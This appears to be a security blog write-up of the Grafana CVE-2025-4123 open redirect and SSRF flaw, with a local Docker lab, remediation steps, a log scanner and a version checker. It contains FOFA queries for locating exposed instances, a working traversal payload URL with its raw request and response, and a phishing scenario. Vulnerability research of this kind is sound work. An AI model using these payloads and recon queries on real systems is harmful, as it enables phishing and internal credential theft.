CVE-2025-4123 Grafana Open Redirect & SSRF — Full PoC — CVSS 7.6 HIGH

medium.com · Dharanis · 13 days ago · research
Client-Side Path Traversal in /public/ · No Auth Required · Grafana < 12.0.0

Dharanis · ~5 min read · March 26, 2026 (Updated: March 26, 2026)

01 Overview

What is CVE-2025-4123?

CVE-2025-4123 is a high-severity vulnerability affecting Grafana, the industry-standard open-source observability platform deployed across millions of engineering stacks worldwide. It was discovered by security researcher Alvaro Balada via Grafana's bug bounty program on April 26, 2025, and publicly disclosed on May 21, 2025.

The root cause is a client-side path traversal flaw in Grafana's /public/ static file handler. By crafting a single malformed URL with encoded path separators, an attacker can escape the intended directory scope and trigger three distinct attack primitives, all without any authentication:

Open Redirect: redirect victims to any external domain via a crafted Grafana URL. The trusted domain is abused for phishing; no login is needed.

Full-Read SSRF: reach internal cloud metadata services (169.254.169.254) and internal APIs when the Grafana Image Renderer plugin is installed.

Stored XSS: execute arbitrary JavaScript in a victim's browser when anonymous access is enabled, a common configuration for public dashboards.

[Image: CVE-2025-4123 full details table from the official disclosure]

02 Reconnaissance

Finding Grafana Instances with FOFA

FOFA is a cyberspace mapping engine widely used by bug bounty hunters and red teamers for asset discovery. Grafana exposes a unique favicon with a known hash, making it trivially fingerprinted across the internet regardless of URL structure or port number.
FOFA Queries

    # Find ALL Grafana instances globally
    app="Grafana"

    # Target a specific bug bounty scope (either form)
    domain="example.com" && icon_hash="2123863676"
    Host="example.com" && icon_hash="2123863676"

[Image: FOFA query targeting a specific domain with the Grafana favicon hash]

Version Fingerprinting (No Auth Required)

Before sending any payload, confirm the Grafana version. The /api/health endpoint returns the exact build version with zero authentication:

    curl http://TARGET:3000/api/health

    # Response:
    {
      "commit": "03f502a94d17f7dc4e6c34acdf8428aedd986e4c",
      "database": "ok",
      "version": "10.4.0"          ← VULNERABLE (< 12.0.0-security-01)
    }

[Image: /api/health leaking the exact version; version 10.4.0 confirmed vulnerable]

    Version Range                 Status
    All 10.x < 10.4.14            VULNERABLE
    All 11.x < backport patch     VULNERABLE
    12.0.0 (GA release)           VULNERABLE
    >= 12.0.0-security-01         PATCHED ✓

03 Lab Setup

Spinning Up a Vulnerable Lab with Docker

All testing was performed on Kali Linux using a locally containerized Grafana 10.4.0 instance, fully isolated and reproducible.

Step 1 — Clone Exploit Tool

    # Clone the PoC tool
    git clone https://github.com/ynsmroztas/CVE-2025-4123-Exploit-Tool-Grafana-
    cd CVE-2025-4123-Exploit-Tool-Grafana-

    # Install Python dependency
    pip install requests

Step 2 — Launch Vulnerable Grafana Container

    # Pull and run Grafana 10.4.0 (vulnerable); named so it can be stopped later
    docker run -d --name grafana -p 3000:3000 grafana/grafana:10.4.0

    # Verify it's live
    curl http://127.0.0.1:3000/api/health

[Image: Docker pulling grafana:10.4.0, ~110MB across 7 layers, container on port 3000]

04 Exploitation

Three Methods to Trigger the Vulnerability

⚠ Responsible Disclosure: All testing was conducted in an isolated local lab environment against a self-hosted container. Never test against production systems without explicit written authorization.

Method 1 — exploit.py Interactive Mode

Run the exploit tool against the local Grafana instance.
It supports SSRF, LFI, and Open Redirect modes:

    python3 cve_2025_4123_exploit_mitsec.py -u http://127.0.0.1:3000

For Open Redirect targeting google.com, the tool generates this crafted payload URL:

    http://127.0.0.1:3000/public/..%2F%5cgoogle.com%2F%3f%2F..%2F..

The key trick here is the path traversal sequence ..%2F (URL-encoded ../) combined with %5c (an encoded backslash) to escape the /public/ directory scope. Grafana's static file handler issues the redirect without validating the final destination.

Method 2 — Burp Suite Repeater

Manually sending the payload in Burp Suite confirms the raw HTTP behavior: a clean 302 Found response.

    GET /public/..%2F%5cgoogle.com%2F%3f%2F..%2F.. HTTP/1.1
    Host: 127.0.0.1:3000
    User-Agent: Mozilla/5.0
    Accept: */*
    Connection: close

    ---

    HTTP/1.1 302 Found
    Content-Type: text/html; charset=utf-8
    Location: /\google.com/?/../..
    Date: Mon, 09 Mar 2026 11:45:41 GMT
    Content-Length: 44

    Found.

[Image: Burp Suite Repeater confirming 302 → Location: /\google.com/?/../..]

Method 3 — Browser Open Redirect (Live Demo)

When a victim clicks a crafted link or it loads inside a phishing iframe, their browser follows the 302 from the trusted Grafana domain, silently navigating to the attacker's site:

    # Victim sees this URL (looks like a legitimate Grafana link):
    http://grafana.company.com/public/..%2F%5Cgoogle.com%2F%3F%2F..%2F..

    # Browser ends up at:
    https://google.com/?/../..          ← or any attacker-controlled domain

[Image: Browser open redirect confirmed; google.com loaded directly from the Grafana URL]

05 Impact

Why This Matters at Scale

Grafana sits at the center of modern observability stacks, connected to Prometheus, databases, cloud accounts, CI/CD pipelines, and on-call systems. Compromise of Grafana frequently means access to every credential and data source it manages.
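The crafted /public/ request and the 302 it produces leave a clear trace in the web server or reverse proxy access log. As an added example, not part of the original post or the exploit tool, the script below scans combined-format log lines (constructed here) for /public/ requests whose percent-decoded path contains a backslash or a ".." segment; decoding first means the lowercase %5c and uppercase %5C forms seen in the Methods above are treated alike.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in combined log format (not from a real server). The two
# /public/ traversal requests use the payload shape shown in the Methods above.
SAMPLE_LOG = """\
203.0.113.5 - - [09/Mar/2026:11:45:41 +0000] "GET /public/..%2F%5cgoogle.com%2F%3f%2F..%2F.. HTTP/1.1" 302 44 "-" "Mozilla/5.0"
203.0.113.5 - - [09/Mar/2026:11:45:42 +0000] "GET /public/build/grafana.dark.css HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
198.51.100.7 - - [09/Mar/2026:11:46:00 +0000] "GET /public/..%2F%5Cexample.org%2F%3F%2F..%2F.. HTTP/1.1" 302 44 "-" "curl/8.0"
198.51.100.7 - - [09/Mar/2026:11:46:10 +0000] "GET /api/health HTTP/1.1" 200 80 "-" "curl/8.0"
"""

# client address, request path and response status from a combined-format line
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|HEAD|POST|OPTIONS) (\S+) HTTP/[\d.]+" (\d{3})')


def normalise_path(path, max_rounds=3):
    """Percent-decode until stable so %5c, %5C, %2F and repeated encodings compare alike."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def is_traversal_under_public(path):
    """True if a /public/ request contains a backslash or a '..' segment after decoding."""
    if not path.lower().startswith("/public/"):
        return False
    decoded = normalise_path(path)
    segments = decoded.replace("\\", "/").split("/")
    return "\\" in decoded or ".." in segments


def scan_access_log(text):
    """Return (client, raw path, status) for every suspicious /public/ request in the log."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and is_traversal_under_public(m.group(2)):
            hits.append((m.group(1), m.group(2), int(m.group(3))))
    return hits


if __name__ == "__main__":
    for client, path, status in scan_access_log(SAMPLE_LOG):
        print(f"{client} {status} {path}")
```

Run against real logs, a hit with status 302 is the server actually issuing the redirect, while a 404 or 403 on the same path shows the patched handler or the proxy rule rejecting it.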
[Image: Impact matrix and CVSS 7.6 High scoring breakdown]

🔴 Critical Attack Scenario

An attacker sends a phishing email with a link to grafana.company.com/public/..%2F%5Cattacker.com... The target sees a legitimate company domain in the URL, clicks it, and lands on a credential-harvesting page. The open redirect requires zero auth and works on any vulnerable instance regardless of Grafana's authentication settings.

    Attack Mode     Impact                                               Prerequisite
    Open Redirect   Phishing, credential theft, session hijacking        None — works universally
    SSRF            AWS/GCP/Azure IAM credentials, internal API access   Image Renderer plugin installed
    LFI             Read server-side files (config, keys, .env)          Specific endpoint configuration
    XSS             Arbitrary JS execution in victim's browser           Anonymous access enabled

06 Remediation

How to Fix This Immediately

1. Upgrade Grafana to the patched version

The only complete fix is upgrading. All versions below the security patch remain vulnerable.

2. Pull the security release via Docker

    docker pull grafana/grafana:12.0.0-security-01
    # Stop and remove the vulnerable container (assumes it was started with --name grafana)
    docker stop grafana && docker rm grafana
    docker run -d --name grafana -p 3000:3000 grafana/grafana:12.0.0-security-01

    # Verify patch
    curl http://localhost:3000/api/health | grep version
    # Must show >= 12.0.0-security-01

3. Check your version track for the minimum safe version

    Grafana Track   Minimum Safe Version
    12.x            12.0.0-security-01 or 12.0.1+
    11.x            11.6.1, 11.5.4, 11.4.3, 11.3.4, 11.2.8, 11.1.11, 11.0.11
    10.x            10.4.14, 10.3.18
    9.x / 8.x       End of Life — upgrade required

Temporary Hardening

While patching, consider placing Grafana behind a reverse proxy that strips or blocks requests containing %5c, %2F..%2F, or backslash sequences in the /public/ path. Also audit whether anonymous access is truly needed; disabling it removes the XSS vector.
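Step 3 reduces to comparing the version reported by /api/health (see the recon section) against the track table above. The following is an added example, not code from the post or the exploit tool: it parses a health body (constructed here, mirroring the one shown earlier) and decides whether the build meets the minimum safe release for its track. Treating 12.1+ and 13+ as fixed, and 10.x/11.x minor branches absent from the table as unpatched, are assumptions.

```python
import json
import re

# Minimum safe patch level per major.minor track, taken from the remediation table above.
# 12.0.0 is only safe as the 12.0.0-security-01 build, which is handled separately below.
MIN_SAFE_PATCH = {
    (12, 0): 1,
    (11, 6): 1, (11, 5): 4, (11, 4): 3, (11, 3): 4,
    (11, 2): 8, (11, 1): 11, (11, 0): 11,
    (10, 4): 14, (10, 3): 18,
}

VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:-security-(\d+))?")


def parse_version(text):
    """Split '10.4.0' or '12.0.0-security-01' into (major, minor, patch, security_build)."""
    m = VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised Grafana version string: {text!r}")
    major, minor, patch, sec = m.groups()
    return int(major), int(minor), int(patch), int(sec or 0)


def is_patched(version):
    """True if the version is at or above the minimum safe release for its track."""
    major, minor, patch, sec = parse_version(version)
    if major >= 13 or (major == 12 and minor >= 1):
        return True          # assumption: releases after 12.0.x carry the fix
    if major < 10:
        return False         # 9.x / 8.x are end of life per the table
    if (major, minor, patch) == (12, 0, 0):
        return sec >= 1      # only the -security-01 build of 12.0.0 is fixed
    floor = MIN_SAFE_PATCH.get((major, minor))
    if floor is None:
        return False         # assumption: a minor branch with no listed backport is unpatched
    return patch >= floor


def assess_health(body):
    """Parse a /api/health JSON body and report whether the build is patched."""
    version = json.loads(body)["version"]
    return {"version": version, "patched": is_patched(version)}


# Constructed /api/health body mirroring the response shown in the recon section.
SAMPLE_HEALTH = '{"commit": "03f502a94d17f7dc4e6c34acdf8428aedd986e4c", "database": "ok", "version": "10.4.0"}'

if __name__ == "__main__":
    print(assess_health(SAMPLE_HEALTH))   # {'version': '10.4.0', 'patched': False}
```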
References

▶ Exploit Tool: https://github.com/ynsmroztas/CVE-2025-4123-Exploit-Tool-Grafana-
▶ Official Grafana Advisory: https://grafana.com/blog/grafana-security-release-high-severity-security-fix-for-cve-2025-4123/
▶ Grafana Security Advisory: https://grafana.com/security/security-advisories/cve-2025-4123/
▶ NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-4123
▶ IONIX Analysis: https://www.ionix.io/blog/grafana-cve-2025-4123-open-redirect-stored-xss-patch/
▶ ProjectDiscovery Nuclei Template: https://cloud.projectdiscovery.io/library/CVE-2025-4123
▶ CVSS: 7.6 High — Discovered by Alvaro Balada — Disclosed: May 21, 2025

Tags: #ssrf #grafana #vapt #cybersecurity #bug-bounty